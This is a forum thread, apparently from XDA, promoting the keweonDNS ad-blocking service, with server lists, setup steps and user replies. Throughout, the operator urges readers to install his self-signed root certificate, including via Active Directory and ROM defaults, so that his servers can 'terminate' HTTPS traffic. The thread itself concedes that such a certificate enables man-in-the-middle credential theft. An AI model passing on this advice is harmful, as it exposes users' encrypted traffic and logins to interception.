4. DNS Server which are not DNS Server and they act as (transparent) Proxy can use a self signed root certificate to steal passwords and logins when you install this. The keweon Root Certificate is designed to protect users and against HTTPS errors which will happens because of filter or blocking HTTPS traffic. When a keweonDNS Server is setup as a (transparent) Proxy it is possible to redirect the entire user traffic and get user login and passwords which is generally known as "MITM ATTACK".
Please take note that the usage of a Root Certificate from someone you don't know can cause serious problems when the Server is build up to target user. With a MITM Attack it is possible to get data, passwords and logon credentials.
5. The entire keweonDNS Project is build and invented to protect users, there Data and its protecting against almost all Online threats. Various fuses are build into the entire environments many times.
6. The keweon Servers do not any kind of Data collection. This is one of my core visions. Why I should build up a system which prevent data collection system and then I will do it by myself? There is also NO (!) Data Collection even on Servers OS Level.
The entire keweonDNS System runs public with global access since 2014. At this point let me say thanks a lot to all users for there trust into me and the entire keweonDNS solution.
Thanks a lot to each single user!!
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
**************************************************************
Business inquires: Please see contact information section below.
***************************************************************
**************************************************************
Keweon quick start.
Read the available servers and certificate sections now if you already know what you are doing. New users please skip to the "About Keweon" section below and return to the DNS and Certificate sections later:
**************************************************************
**************************************************************
Available DNS servers (choose one primary and one secondary):
Main Servers:
IP: 176.9.62.58
IP: 176.9.62.62
or
IPv6: 2a01:4f8:150:8023::58
IPv6: 2a01:4f8:150:8023::62
Click to expand...
Click to collapse
Update November 28, 2018:
If you have installed the root certificate, I recommend that you use these two servers. This servers can be used without certificate but a lot of sites will not porpper work.
IPv4: 213.239.207.143
IPv6: 2a01:4f8:a0:8487::143
IPv4: 107.191.55.215
IPv6: 2001:19f0:6401:175d::215
Click to expand...
Click to collapse
These servers have special blocklist entries which blocks things such as graph.facebook.com, pixel.facebook.com, all amazon-adsystem.com domains and all the things which are normaly not possible to block without any impact to apps, websites and other things. Also, this blocks special domains for YouTube which prevents data transmission to them.
**************************************************************
Available Server List for keweon Privacy & Security
(Server Edition keweonDNS v.6.80.280.LL)
Australia / Sidney: (vServer)
k1ns-au-001.keweon.center
45.76.125.130
2001:19f0:5801:b45::130
France / Paris: (vServer)
k1ns-fr-001.keweon.center
45.77.62.37
2001:19f0:6801:95e::37
Germany / Frankfurt (vServer)
k1ns-de-001.keweon.center
104.207.131.11
2001:19f0:6c01:61f::11
India / Bangalore (vServer)
k1ns-in-001.keweon.center
IPv4: 139.59.33.236
IPv6: 2400:6180:100:d0::30d:5001
Japan / Tokio (vServer)
k1ns-jp-001.keweon.center
45.77.25.72
2001:19f0:7001:22a8::72
Netherland / Amsterdam (vServer)
k1ns-nl-001.keweon.center
45.77.138.206
2001:19f0:5001:d8d::206
Singapore / Singapore: (vServer)
k1ns-sp-001.keweon.center
45.76.151.221
2001:19f0:4400:4f31::221
UK / London (vServer)
k1ns-lon-001.keweon.center
45.32.183.39
2001:19f0:7402:a61::39
USA / Dallas (vServer)
k1ns-tx-001.keweon.center
45.76.57.41
2001:19f0:6401:9ed::41
USA / New Jersey (vServer)
k1ns-ny-001.keweon.center
45.77.144.132
2001:19f0:5:2962::132
USA / Silicon Valley (vServer)
k1ns-sv-001.keweon.center
45.32.140.26
2001:19f0:ac01:639::26
**************************************************************
**************************************************************
Keweon Root certificate (not required, but will suppress certificate errors):
http://pki.keweon.center
For Windows Systeme (MSI File) The certificate is working for IE, Edge and Chrome Browser.
>> CLICK HERE <<
MSI within a ZIP file:
>> CLICK HERE <<
For Android and iOS devices, also for Firefox and Mozilla Browser:
>> CLICK HERE <<
Certificate within a ZIP file:
>> CLICK HERE <<
For Admins to use it within Active Directory as REG file:
>> CLICK HERE <<
REG within a ZIP file:
>> CLICK HERE <<
If you want to have a "AllInOne Package" use this link please:
>> CLICK HERE <<
(End of Quick Start section)
**************************************************************
**************************************************************
About Keweon:
Keweon comes from the German words "KEine WErbung ONline"--translated to English it means "no advertising online."
Keweon is more than a generic adblock system. Keweon does:
Advertising Blocking
Adware Protection
App Protection
Bandwidth Protection for Mobile Phones
Botnets Protection
Cryptoware Protection
Fake Online Shop Filter
Fake Software Protection
Malware Protection
Miningware Protection
Online Worms Protection
Pharming Protection
Phishing Protection
Popup Blocker
Privacy Protection
Ransomware Protection
Remote Keyloggers Protection
Rogue Security Software Protection
Spoofing Protection
Spyware Protection
Tracing Protection
Tracking Protection
Trojan Protection
Virus Protection
and a lot of other things
Things Keweon does not do or does not have:
Acceptible advertising exceptions
A Malware or virus scanner
Data collection
Keweon will:
Save bandwidth. Ads are blocked, not just hidden.
**************************************************************
**************************************************************
Basic instructions:
1. Take the DNS Servers
2. Install the keweon Adblock Root Certificate (recommended, not required)
3. Change your Internet Router or your Mobile Device to use the servers
4. Reboot (Router and PC)
**************************************************************
**************************************************************
Trusted apps for changing DNS on your device:
- Android: https://play.google.com/store/apps/details?id=com.frostnerd.dnschanger
- iOS/Apple: https://itunes.apple.com/us/app/dns-override-set-dns-for-wi-fi-and-cellular/id1060830093
- Chrome OS: Click on wifi icon, click on Network, scroll to Name Servers, and input DNS entries.
- Chrome browser help: https://www.xda-developers.com/fix-dns-ad-blocker-chrome/
**************************************************************
**************************************************************
FAQ:
1) Does my traffic runs trough the keweon System?
Not even one byte from you or your device will flow through my servers. Also the same with HTTPS things. Take a sniffer or wireshark or NirSoft Network Suites and you will be surprised. All HTTPS Ads traffic will be terminated with "0" bytes which will show to you that there is no sniffing or spying from my side.
2) Here are some questions from Telegram users which might be interesting for you.
http://downloads.keweon.center/keweon/keweon_questionnaire.pdf
3) If you have questions - please ask!
**************************************************************
**************************************************************
Contact information:
If you want to send blacklists (things that should be blocked) please send them to: [email protected]
If you want to send whitelists (things that shouldn't be blocked) please send them to: [email protected]
If you open a Website and this site looks kind of strange because of missing CSS & other things, then take the URL, copy to TXT and send this TXT to: [email protected]
Developer email: [email protected] (If you are a Company and if you want to test and use keweonDNS within a business environment I can offer you a faster connection within EMEA.
This is only possible if you have a public static IP Address. Dynamic Addresses are currently not possible for security reasons.)
**************************************************************
**************************************************************
New license terms because of the EU DSGVO/GDRP (25.05.2018):
Business and Corporate usage is not allowed without my written permission.
The usage of keweon within a private and personal environment and all released and public available files of the entire keweon System are subject of the License right of the WTFPL license.
Excluded from this license are all server technologies, the SSL technologies and in addition all source codes which personally belongs to me.
**************************************************************
How to use keweon?
It's very easy:
1. Take the DNS Servers
2. Install the keweon Adblock Root Certificate ( <<< THIS IS ONLY A RECOMMENDATION)
3. Change your Internet Router or your Mobile Device to it
4. Reboot (Router and PC)
5. Done! That's it.
6. See the Internet within a never seen way
In the meantime the keweon AdBlock Root Certificate has more than 4 Millions global downloads. This certificate is not required but for a few websites it is mandatory.
This certificate will only surpress the certificate errors. Not all of them because I'm still working on this.
On iOS Devices just open Safari. With Android use the default Browser and go to http://pki.keweon.center and after 3 sec. the download of the certificate will start. JUST THE DOWNLOAD!! You need to install it by yourself. More facts about the keweon Root Certificate will comming soon on the website.
Test the DNS Servers within this List and choose the one which is the fastest for you:
https://forum.xda-developers.com/android/software-hacking/keweon-privacy-online-security-t3681139#6
How to use it on Android devices:
Use an App of your choice or use this. I also use this app and from my point of view this is the worldwide best App to change the DNS settings on Android devices. No Root Access is required. The developer is from Germany and I have had a good contact to him. The app is free of charge and also free of advertising. The source code for this app is also available on GitHub. If you have troubles with it or want to have additonal features than contact the developer. He would be happy about every feedback.
https://play.google.com/store/apps/details?id=com.frostnerd.dnschanger
How to use it on iOS/Apple devices:
All my iOS Tester using this App. If you have a better one or you are able to translate the Android App to XCode - your welcome.
https://itunes.apple.com/us/app/dns-override-set-dns-for-wi-fi-and-cellular/id1060830093
You are using Chrome and the DNS thing is not working? (thanks a lot @NamitNayan for this info)
Google wants to prevent Adblocking via DNS. Therefore they have enabled an experimental Switch by default to prevent DNS blocking.
Take a look at here if it's not working >>> HERE <<< and fix the problem within seconds.
Technical Details
Public available DNS:
Take a look at this thread:
https://forum.xda-developers.com/showpost.php?p=73985083&postcount=6
Background System:
The current system needs 42 Server (!) in the Background that everything is working.
Actually the entire infrastructure is hosted on 5 different providers.
How does it work?
The entire System works with several Servers. Ubuntu, FreeBSD 11 and my own build Operation System based on UNIX is installed. The entire developement and all source codes are not public available. There is more than 14 yrs of work inside.
Current Blacklist size:
39.585.224 Domains (export to TXT)
Current Virus/Ransomware Blacklist size:
18.853.587 Domains (export to TXT)
Current Blacklist contains:
Tracker, Malware, Spyware, Adware, Advertising, Poison Websites Fake Software (Adobe Flash Updates which is in real Malware/Virus) & a few false/positive Sites.
To cover all HTTPS errors because a lot of Advertising Vendors display and spread this crap via https to the world I have created the keweon Root Certificate. Allmost every Malware and Spyware will be installed via HTTPS. The Root Certificate is only responsible to suppress all https error messages for all this Advertising and poison things.
Which Systems are working and acting with keweon?
The keweon System is tested on almost every Operation System and Devices (iOS, Android, Xbox, Playstation, Samsung TV, etc... ) It's currently running within 3 companies because I know the Admins there. You can use it within you private environment but please DO NOT USE it within a Business environment.
Why I can't use it within a Business environment?
There are 2 reasons for it.
1. I want that the entire system becomes free for private and personal usage and I already have requests from Companies and even from the Public Sector that they are interested about to use the System. As long as there are too many error within the System I don't have the option to sell this as an Business solution. That's the deal.
2. Private for free, Business needs to license it. Of cause, the current system needs to be a bigger and stable system..
Does my traffic runs trough the keweon System?
Not even one byte from you or your device will flows through my servers. Also the same with the HTTPS things. Take a sniffer or wireshark or NirSoft Network Suites and you will be surprised. All HTTPS Ads traffic will be terminated with "0" bytes which will show to you that there is no sniffing or spying from my side.
It would not make any sense that I drop all this crap traffic, blame to the advertising Industrie and I do exactly this things which I want to prevent?
Btw... This fact was also the problem why I have had no success with investors. They want that I enable data sniffing or user sniffing but I would rather throw away the entire system & developement than doing what they want.
I need your help and support
1. Support me with Black and White lists
It’s veryimportant to know that keweonDNS will NEVER (!) do a censorship of the Internet. If you want to have i.e. Facebook blocked via HOSTS file, it’s up to you. But this will never be done via keweonDNS. I have other plans with porn and violence but this is a stage with keweon kidsafe which is currently far, far away.
IMPORTANT:
Any list you want to send to me has to be send as an attachment within an EMail. I will give you a short example for this.
If you have a Raspberry PI and you have a real cute blacklist than copy all the addresses (or URL’s) into a TXT file and send it to me via mail. The same with some important whitelists. Don't care about the size.
Don’t copy the addresses or URL's into Subject or Body of this Mail because this will never arrive. I don’t want to track and check all the mails and for security reasons only attachments will be processed. Please make sure you only send ZIP files that contains the TXT file or send native TXT files. Everything else will be dropped for security reasons. Don’t care about double entries and it doesn’t matters if you send the same TXT file 5 or 10 times again and again.
Websites which contains errors or Whitelist needs to be processed within the same way. Send the TXT or ZiP – that’s it.
If you want to send blacklists please send them to: [email protected]
If you want to send whitelists please send them to: [email protected]
2. Support me with false/positive on keweonDNS
If you open a Site and this site stay blank than copy the URL into a TXT file and send it to me. You do not need to collect them. If you send me 50 or 100 Mails and each of them contains only 1 link or address this doesn't matters.
If you want to send URL’s or Links which are blocked and should be not blocked then send them to: [email protected]
If you open a Website and this site looks some kind of strange because of missing CSS & other pretty Website things than take the URL, copy to TXT and send this TXT to: [email protected]
3. Router Compatibility:
With a lot of SOHO Router it is possible to change the IPv6 and IPv4 default DNS Server Address. But there are are also a lot of Router outside where this is not possible.
If you can provide some instructions and screenshots within a PDF I will release this on the Webpage. I have the experience that the AVM FritzBox sometimes will work and sometimes not. That is related to the fact that the Provider support IPv6 and you are only able to change the IPv4 DNS Server Address. With the tiny tool "FBEDITOR" it should be possible to change also the default IPv6 DNS Server Address on AVM Boxes.
German Telekom Router are also a peace of crap. There you can change nothing except the Password and the WLAN key. The work arround by selecting "Different Provider" (anderer Anbieter) where you can set manualy the DNS Server will not work.
Unfortunately I only have CISCO, LINKSYS and ASUS Hardware running with i.e. DD-WRT. I appreciate if you can help me with creating instructions how to change DNS v4 & v6 settings on your Home/SOHO/Wireless Router. No rush on this because all this instructions will be released on the Website.
Million thanks in advance!
Important Links
Website:
http://www.keweon.de and http://www.keweon.com
Forum (in progress)
http://forum.keweon.com
http://board.keweon.com
http://forum.keweon.de
http://board.keweon.de
App URLs:
Android Apps:
Frostnerd (Daniel's) DNS Changer App
Frostnerd (Daniel's) DoT and DoH (DNS over TLS and HTTPS) App (under developement)
iPhone and other iOS devices Apps:
AppStore App - Free of charge DoH changer App
keweon Root Certificate
http://pki.keweon.center
For Windows Systeme (MSI File) The certificate is working for IE, Edge, Opera, Chrome which has no own certificate storage.
MSI within a ZIP file
For Android and iOS devices, also for Firefox and Mozilla Browser (just visit the site with the Browser)
Certificate within a ZIP file
For Admins to use it within Active Directory as REG file
REG within a ZIP file
If you want to have a "AllInOne Package" use this link please
Additional Links
Change DNS Settings on DD-WRT with DNSMASQ within the right way
How to set Firefox DoH Settings
keweonDNS for Windows
Download the QuickSetDNS from NIRSOFT and use it on Windows to change your DNS settings.
Currently it's only working with IPv4. Link to NirSoft is HERE
Use the QuickSetDNS config to add all DNS servers and choose your favorite DNS Server. Unzip the file, copy it into the directory where you have extracted the download.
If you have any recommendations about additional links, let me know!
keweonDNS & installation Information
ALL keweonDNS Servers:
Version: DoT Server - DNS over TLS (updated 03/21/2019)
Used Certificate: Let'sEncrypt Certificate
Server Address: dot.asecdns.com
Port: 853 & 443
IP Addresses:
dot.asecdns.com (159.69.48.240 - HETTNER RZ Falkenstein)
dot.asecdns.com (116.203.117.199 - HETTNER RZ Nuernberg)
dot.asecdns.com (95.216.192.253 - HETTNER RZ Helsinki)
dot.asecdns.com (2a01:4f8:1c17:6e44::240 - HETTNER RZ Falkenstein)
dot.asecdns.com (2a01:4f8:c2c:491::199 - HETTNER RZ Nuernberg)
dot.asecdns.com (2a01:4f9:c010:3071::253 - HETTNER RZ Helsinki)
Version: DoH Server - DNS over HTTPS (updated 03/21/2019)
Used Certificate: Let'sEncrypt Certificate
Server Address: doh.asecdns.com/nebulo
Port: 443
IP Addresses:
doh.asecdns.com (159.69.49.250 - HETTNER RZ Falkenstein)
doh.asecdns.com (116.203.126.207 - HETTNER RZ Nuernberg)
doh.asecdns.com (95.216.165.29 - HETTNER RZ Helsinki)
doh.asecdns.com (2a01:4f8:1c17:6fc7::250 - HETTNER RZ Falkenstein)
doh.asecdns.com (2a01:4f8:c2c:e25::207 - HETTNER RZ Nuernberg)
doh.asecdns.com (2a01:4f9:c010:1cbd::29 - HETTNER RZ Helsinki)
Version: keweonDNS v.6.80.280.LL (updated 03/21/2019)
Australia / Sidney: (vServer)
k1ns-au-001.keweon.center
45.76.125.130
2001:19f0:5801:b45::130
France / Paris: (vServer)
k1ns-fr-001.keweon.center
45.77.62.37
2001:19f0:6801:95e::37
Germany / Frankfurt (vServer)
k1ns-de-001.keweon.center
104.207.131.11
2001:19f0:6c01:61f::11
India / Bangalore (vServer)
k1ns-in-001.keweon.center
IPv4: 139.59.33.236
IPv6: 2400:6180:100:d0::30d:5001
Japan / Tokio (vServer)
k1ns-jp-001.keweon.center
45.77.25.72
2001:19f0:7001:22a8::72
Netherland / Amsterdam (vServer)
k1ns-nl-001.keweon.center
45.77.138.206
2001:19f0:5001:d8d::206
Singapore / Singapore: (vServer)
k1ns-sp-001.keweon.center
45.76.151.221
2001:19f0:4400:4f31::221
UK / London (vServer)
k1ns-lon-001.keweon.center
45.32.183.39
2001:19f0:7402:a61::39
USA / Dallas (vServer)
k1ns-tx-001.keweon.center
45.76.57.41
2001:19f0:6401:9ed::41
USA / New Jersey (vServer)
k1ns-ny-001.keweon.center
45.77.144.132
2001:19f0:5:2962::132
USA / Silicon Valley (vServer)
k1ns-sv-001.keweon.center
45.32.140.26
2001:19f0:ac01:639::26
Physical Instance:
Germany / Falkenstein
k1-de-058-fsn.keweon.center (Physical)
176.9.62.58
2a01:4f8:150:8023::58
and
176.9.62.62
2a01:4f8:150:8023::62
DNS Server to use with keweon Adblock Root Certificate:
This Servers block in addition:
- pixel.facebook.com
- Amazon data collection and advertising
- more things which are normally not possible will coming soon step by step
Germany / Nuernberg
k1-de-143-nbg.keweon.center (Physical)
213.239.207.143
2a01:4f8:a0:8487::143
USA / Dallas - Texas
k1-ns2-us02.keweon.center (vServer)
107.191.55.215
2001:19f0:6401:175d::215
(Updated at 21. March 2019)
Works like a charm better than adaway just download a dns app just have to change the dns then your done
Works like a charm. Thank you. Is there any difference between this and using VPN-based adblocking apps? (importing our own blacklists into it)
ninjanmizuki said:
Works like a charm. Thank you. Is there any difference between this and using VPN-based adblocking apps? (importing our own blacklists into it)
Click to expand...
Click to collapse
This should be no Problem. But if you are using with the VPN App a different DNS Server than my system might not longer work. No clue about your VPN & DNS settings.
Please keep in mind, the last DNS Server rules. If you set my DNS Server and than u run a VPN App with a different DNS Server u will "overwrite" my DNS Server settings.
From the blacklist itself that should fit. Haven't had this bevor. ?
Send me PM if you have further questions.
Anyway, thanks a lot.
UPDATE:
The current Infrastructure will be upgraded to 10 GBit (!) DNS Server power and much more faster system.
Please notice that the DNS Server addresses will change during the next weeks.
After this upgrade you can spread the system to all of your friends.
Thanks a lot & more will comming soon on the website
...which is currently still under developement...
MrT69 said:
UPDATE:
The current Infrastructure will be upgraded to 10 GBit (!) DNS Server power and much more faster system.
Please notice that the DNS Server addresses will change during the next weeks.
After this upgrade you can spread the system to all of your friends.
Thanks a lot & more will comming soon on the website
...which is currently still under developement...
Click to expand...
Click to collapse
Working well, but I get 'invalid security certificate' error popup on most pages. Any way to eliminate?
If this URLs are wrong within the blacklist, do me a favor and send them to me to whitelist them.
Copy the URLs from the Browser into a TXT file and send this to. Keep in mind only attachments will arrive. It will help not if you type the addresses or URLs within the mail Body.
[email protected]
Doesn't matters if you send 100 Mails per Day because the will automatically processed during the night.
I'm happy for every wrong listed URL. Million thanks in advance for your feedback.
If this is affecting websites which are not false positive than you need to wait a few days. Currently I'm working to terminate all https crap from the advertising side. But therefore it is a must to have the keweon Root Certificate installed. Right now I need to terminate every https error manually.
It is incredible how many poison sites work with HTTPS so it was a need to develope a different solution than doing this always manually. The server installation is in progress but first I need to finalize the tests. Should be done until next weekend.
Update 1:
Please take a look at the second posting. The first 10Gbit DNS Server is online and working. Yeaaahhhhh!!!
Germany:
10Gbit DNS v4: 89.33.16.222
10Gbit DNS v6: 2a01:367:c1f2::448
Of cause it's a shared 10Gbit - but it's in Germany and damn fast. Next month the second 10Gbit in USA will be online. Installation is already in progress.
Update 2:
Today at 3:00 AM (Germany GMT+1) after the daily reboot procedure the entire HTTPS problem is solved.
If you have the keweon Root Certificate installed EVERY (!) HTTPS error is gone. I was developing this procedure since more than 2 yrs and during the last 3 months I have had no additional problems or errors.
The entire HTTPS crap will be terminated and to make sure that this is done from my site, every "keweon termination" is marked with a specific favicon. Sometimes it happens that a site still has a problem with the HTTPS errors even when everything is working on my site. This happens to HTTPS overlays or HTTPS calls with bad coded Java Scripts. If this error happens that you receive a Banner or Overlay with HTTPS error message than please reload the site and the error will never occurs again.
The problem is related to the programmers of the websites. Sometimes I have the feeling that some of them still use FRONTPAGE to develope websites. Anyway, just reload and that's it.
Now the big question - is this save?
Absolut! I will terminate only the evil traffic and within the tunnel there are no data. Let's assume I will do this with Paypal - what will happens?
When the URL's "PayPal and PayPalObjects" are on my blacklists than it is not possible at all for you to contact the website. Because of this it is also not possible to grab any input from your site because the login to PayPal would be not longer possible. Please feel so free and track the traffic. I even would help to investigate and help you to take a deeper look inside.
How is it possible?
Please understand that this is a very difficult thing to explain and on the other hand everything what I would release here in XDA is also visible to "the dark side" and they might have the option to do strike against this. Of cause, I will release more informations on the website which will be the next thing during the next 2 weeks. Currently 40 Servers within the Background only working for terminate this problem. Yes, this is a raised middlefinger to the entire & global ads industrie and I'm so damn proud of my solution.
Please remember: The keweon Root Certificate is still not required. If you have concerns than it is OK for me if you do not use it. If you would like to have a clean and "https error confirmation free" Internet than you should to install it. The certificate will be available at: http://pki.keweon.center - the download will start after 3 seconds and you need to install it.
Update 3:
This is the cutest news. Since one month a company was testing the solution and with the "Sophos" appliance it was possible to configure it within a way that the local installation of the "keweon Root Certificate" was not longer required.
I guess Sophos will not realy notice me but from today I can say that keweon official supports the "Sophos Appliance". The tutorial is in progress and as soon as this is finished I will release it. I hope I will get more instructions from your side how to mange this with other Systems. (CISCO, Checkpoint, PaloAlto and other heavy firewall and security systems)
I like this concept and want to keep testing. Here's my issue - for some reason, activating design change causes very slow loading speed. Same on WiFi or mobile. I have entries active for ipv4 and ipv6. For ipv4, the first set of numbers in post 2 won't work. Dns changer shows red line in entry field, (bad numbers). So, I'm using the second set, (starts with 51.254...). For ipv6, I'm using the first set. They work fine, but cause it to take 10-20 seconds to load a page. It seems like it gets better the more I browse, but still will take 5-10 seconds to load just about any page, and when I open up dns changer and hit 'stop', it is automatically faster, no more lag.
I wondered at first if it was a conflict with other tweaks and mods, (I have build prop tweaks, and AFWall app, etc), so I undid everything and tried again, but the same. I use Naked Browser almost exclusively, but tested with AOSP browser also, and no different.
Any ideas? Thanks
levone1 said:
I like this concept and want to keep testing. Here's my issue - for some reason, activating design change causes very slow loading speed. Same on WiFi or mobile. I have entries active for ipv4 and ipv6. For ipv4, the first set of numbers in post 2 won't work. Dns changer shows red line in entry field, (bad numbers). So, I'm using the second set, (starts with 51.254...). For ipv6, I'm using the first set. They work fine, but cause it to take 10-20 seconds to load a page. It seems like it gets better the more I browse, but still will take 5-10 seconds to load just about any page, and when I open up dns changer and hit 'stop', it is automatically faster, no more lag.
I wondered at first if it was a conflict with other tweaks and mods, (I have build prop tweaks, and AFWall app, etc), so I undid everything and tried again, but the same. I use Naked Browser almost exclusively, but tested with AOSP browser also, and no different.
Any ideas? Thanks
Click to expand...
Click to collapse
Thanks a lot for the feedback.
The problem is related to the latency of my current VPS. That was one of the main reason why I would need to find an Investor. The entire system needs to be run from a physical Host but this will need an Invest for 200.000 Euro per year. 20 GBit Server located within 16 Countries world wide. Would be so cute but they wanted that I collect data from users to sell this. I guess you can imagine what my answers was to this stupid idea.
Anyway... I guess I have an idea. First at all, which county/city you are located? If you don't want to make this public send me a short PM.
Thanks a lot for your support. I'm pretty sure I will find a solution ?
Btw... Anyone else with this problem? Send a short PM with your Country/City.
Thank you very much, it works very well.
I do have a small delay from 5 up to 15 seconds on an initial connection but after the webpage is loaded there is no more delay and often faster than without the dns.
For me its not a big issue, I did pm you with my country and city in case it may be if help for you.
MILLION TIMES THANKS TO ALL OF YOU
FOR YOUR SUPPORT & TRUST INTO KEWEON
Today I received the first f/p blacklist settings and this will be in place tomorrow morning 03:00 AM GMT +1 (German Time). Good to see that the system is in use.
With the help and testing from a view users it seems the current DNS Servers are to slow. I will change the public front end infrastructure. I will anounce this bevore to prevent interruption.
But keep in mind!
I'M NOT GOOGLE OR ANY OTHER DNS PROVIDER WITH A BILLION EURO BUDGET!
Unfortunately I don't have the money to do what I want but I guess this is anyway the best solution which is currently available. I need to host everything on VPS which is from the technical point of view not the best solution because of a high latency. I'm working on this, still think about Investor or Crowdfunding or anthing like this. But first at all I want to have a usable system and a pretty website in place.
That will finally mean that the launch of the website is still in progress - sorry folks - but I guess it is more important that the system will be fast as possible and stable.
OFFER:
If someone of you is interested to take over the responsiblity/administration of the keweon forum - let me know. I'm fine with nearly 8 programming languages but this phpBB3 Board drives me crazy. This is not my world. I appreciate every help and support. My english is not longer the best and my wife would kill me if I would do this also because the technical support of the system needs already a lot of time.
Contact me via PM if you are interested.
MILLION TIMES THANKS AGAIN!
New & faster Servers are online. Feel so free to use it, test it, share it to your friends and wherever you want.
Click here for current DNS Server List
Please test each of the server. Someone from US reportet that UK and NL DNS Server has a damn good performance within USA.
If someone of you have contact to ASIA please let me know what's about the Japan DNS Server.
@Rom DEVS
If you are interested to add the keweon Certificate by default to your ROM you're welcome.
This has the advantage that there is no need to assign a PIN to the device if you place the Certificate by default into the Certificate Store.
Btw, the website is already in progress and I hope you will visit it when it's done.
Really excited about this.
Looking into ways to change the dns on Android with root access, any ideas?
bond32 said:
Really excited about this.
Looking into ways to change the dns on Android with root access, any ideas?
Click to expand...
Click to collapse
Use this App. No Root required. The app is a fake VPN App.
This will mean it will also work in 3G/LTE Mode and it's Open Source available at Git Hub.
Not my App. But I also use this outside.
https://play.google.com/store/apps/details?id=com.frostnerd.dnschanger
Enjoy it!